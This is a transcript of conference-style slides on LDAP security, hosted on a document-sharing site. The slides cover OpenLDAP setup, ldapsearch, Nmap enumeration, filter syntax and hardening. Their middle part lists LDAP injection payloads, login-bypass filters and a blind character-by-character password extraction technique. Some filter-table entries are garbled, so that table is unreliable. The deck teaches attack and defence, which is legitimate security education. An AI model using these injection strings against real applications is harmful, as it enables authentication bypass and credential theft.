LDAP Security - Emre Övünç · LDAP Security Emre ÖVÜN ... BSD-License. OpenLDAP Components •...

Post on 26-Jun-2020

8 views 0 download

Preview:

Click to see full reader
Report this document
SHARE

transcript

LDAP SecurityEmre ÖVÜNÇ

info@emreovunc.com

Who am I ?

• Attack Developer – Picus Security • Security Researcher - Synack

• OSCE – OSCP – OSWP• LFCE – LFCS – ISO27001 LA

• https://github.com/EmreOvunc• https://twitter.com/EmreOvunc

https://github.com/EmreOvunc
https://twitter.com/emreovunc

Lightweight Directory Access Protocol

• TCP/IP

• Client – Server

• X.500 Protocol (1988-1993) | OSI

What is LDAP ?

• Protocol

• Database• Organizations• Units• People• Resources• Devices

• Authentication mechanism

Aim ?

• Access control• Privacy• Security• Authentication

• User management• Delegation• Rights

• Scaling

OpenLDAP

Open-source Free BSD-

License

OpenLDAP Components

• Slapd• Daemon• Receives connections

• Libraries & Utilities

• Client

LDAP Server

Ldap-utils Slapd Phpldapadmin Apache2 Bind9

LDAP Server

Ldap-utils Slapd Phpldapadmin Apache2 Bind9

LDAP Server Configuration

Search Parameters

ldapsearch –H ldap://172.16.155.128 –D ”cn=admin,dc=ovunc,dc=local” –W

-H: LDAP Uniform Resource Identifier(s)-D: bind DN-W: prompt for bind password

DC: domain componentDN: distinguished nameCN: common nameOU: organizational unit nameUID: user id

LDAP Anonymous Authentication

LDAP Simple Authentication

LDAP Configuration

LDAP Simple Authentication

LDAP Anonymous Authentication

LDAP Configuration

LDAP Anonymous Authentication

Nmap LDAP Enumeration

Nmap LDAP Enumeration

Nmap LDAP Bruteforcing

LDAP Filters

Operator Description Example

= Exactly match cn=admin

* Indicates zero or more character

ou=*

>= Greater than or equal uid >=

<= Less than or equal uid >=

=* One or more values cn=*

& And (&(filter)(filter(filter)

| Or (!(filter)(filter(filter)

! Not (!(filter))

LDAP Filters Example

• (&(objectClass=group)(cn=admin))

• (&(objectClass=posix)(cn=*team*))

• (&(objectClass=inetOrgPerson)(memberOf=cn=Admins,ou=redteam))

LDAP Web Application

<input type="text" name="user">Enter the username</input>

ldap_query = “(cn=" + $user + ")”

run(ldap_query)

???

LDAP Web Login Bypass

• (&(user=*)(password=*))

• (&(user=*))%00

• (&(user=*)(&))(password=*))

LDAP Injection Payloads

**)(&*))%00*()|%26'*()|&'*(|(mail=*))*(|(objectclass=*))*)(uid=*))(|(uid=**/*

LDAP Injection

(&(sn=admin)(password=*))(&(sn= admin)(password=a*))(&(sn= admin)(password=b*))

...(&(sn= admin)(password=m*))(&(sn= admin)(password=my*))

…(&(sn=admin)(password=myPassw0rd))

LDAP Injection Question ?

(&(objectClass=[class name])(ou=[unit name]))

(&(objectClass=posix)(ou=redteam))

LDAP Injection Answer

(&(objectClass=[class name])(ou=[unit name]))

(&(objectClass=*)(objectClass=*)(ou=*))

(&(objectClass=*)(objectClass=*) =*))(&(objectClass=foo)( ou=*))

(&(objectClass=*)(objectClass=*))(&(objectClass=people)(ou=redteam))

LDAP Injection Question ?

(&(deviceid=[id])(cn=[device name]))

(&(deviceid=34)(cn=nasbackup))

LDAP Injection Answer

(&(deviceid=[id])(cn=[device name]))

(&(deviceid=34)(ou=a*)(cn=nasbackup))(&(deviceid=34)(ou=b*)(cn=nasbackup))…(&(deviceid=34)(ou=re*)(cn=nasbackup))…(&(deviceid=34)(ou=redteam)(cn=nasbackup))

LDAP Hardening

Input validation (ldap queries)

Least privilege (users & devices)

AppArmor & SELinux configurations

LDAPs (secure connection)

Backup (encrypt & sign)

LDAP Server Hardening

Reject requests;No password,Null password,Unauthenticated,Anonymous users/sessions.

Do not use:SHA-1,LDAPv2,Weak passwords.

• OpenLDAP before 2.4.48

• Administrator delegation -> rootDN

• Slapd service• Authorization

• CVSS 4.9 (NVD)

CVE-2019-13057

• OpenLDAP 2.x before 2.4.48

• SASL authentication• Session Encryption

• ACL configuration• Successful authorization

(different user)

• CVSS 7.5 (NVD)

CVE-2019-13565

Lab

LDAP Lab Objects

LDAP Lab Objects

Organization: redteam

Organization Unit: people

Posix Group: nettim

Users: admin, bob

Demo Time

LDAP Tool J

• git clone https://github.com/EmreOvunc/eLdap-Ldap-Search-and-Filter.git

• cd eLdap-Ldap-Search-and-Filter • sudo pip3 install virtualenv• source myvenv/bin/activate • python3 manage.py runserver

https://github.com/EmreOvunc/eLdap-Ldap-Search-and-Filter.git

LDAP Tool Vuln.

LDAP Tool Attack… not yet!

References

• https://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdf

• https://ldap.com/ldap-filters/

• https://www.cvedetails.com/vulnerability-list/vendor_id-439/Openldap.html

https://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdf
https://ldap.com/ldap-filters/
https://www.cvedetails.com/vulnerability-list/vendor_id-439/Openldap.html

LDAP SecurityEmre ÖVÜNÇ

info@emreovunc.com 16/04/2020

Top related

Schimmel on Yunus emre
Documents
Configuring Local Authentication Using LDAP - cisco.com · Configuring Local Authentication Using LDAP LocalauthenticationusingLightweightDirectoryAccessProtocol(LDAP)allowsanendpointtobe
Documents
LDAP Servers and Applications - HUMBUGquark.humbug.org.au/publications/ldap/ldap-apps-v2.pdf · LDAP Servers and Applications Brad Marshall brad.marshall@member.sage-au.org.au SAGE-AU
Documents
LDAP Injections & Blind LDAP Injections Paper
Technology
Eac volkan emre-0534436-last
Business
Solution for From SQLi to Shell I - Emre Övünç · FIRST PART SQL INJECTION First of all, I scan Vulnerable machine IP which is “192.168.1.117” by using “Nmap”. ( e.g. nmap
Documents
Emre 1974tr
Documents
Configuring LDAP authentication for TM1 9 - 8businessintelligenceonline.webs.com/documents/Configuring_LDAP... · configuring LDAP authentication for TM1 9.5 ... LDAP server certificate
Documents
NDK: LDAP and eDirectory Integration - novell.com · 3 LDAP Event Services 53 ... LDAP and eDirectory Integration LDAP Return Codes ... statements to access eDirectory or Novell Directory
Documents
Introduction to LDAP - HUMBUGquark.humbug.org.au/publications/ldap/ldap_tut_v2.pdf · Introduction to LDAP – p.14/127. Global View LDAP Server 1 LDAP Server 2 LDAP Server 3 Note
Documents
EMRE & Finance
Documents
LDAP Injection & Blind LDAP Injection in Web Applications
Technology
IPv6 Support for LDAP - · PDF fileInformation About IPv6 Support for LDAP TosupportLightweightDirectoryAccessProtocol(LDAP)overIPv6,changesaremadetoauthentication, authorizationandaccounting(AAA
Documents
LDAP Injection & Blind LDAP Injection
Documents
Emre Deliveli
Documents
EMRE Online
Documents
Volkan Emre Thesis 2012
Education
Emre Aykar's presentation
Documents
IPv6 Support for LDAP...IPv6 Support for LDAP TheLightweightDirectoryAccessProtocol(LDAP)isanapplicationprotocolforaccessingandmaintaining distributeddirectoryinformationservicesoveranIPnetwork.
Documents
TROUBLESHOOT YOUR LDAP AUTHENTICATION PROVIDER · Page 19 Test LDAP ports Page 22 Verify secure LDAP configuration - StartTLS Page 23 Verify secure LDAP configuration - SSL Appendix
Documents

Copyright © 2018 DOCUMENTS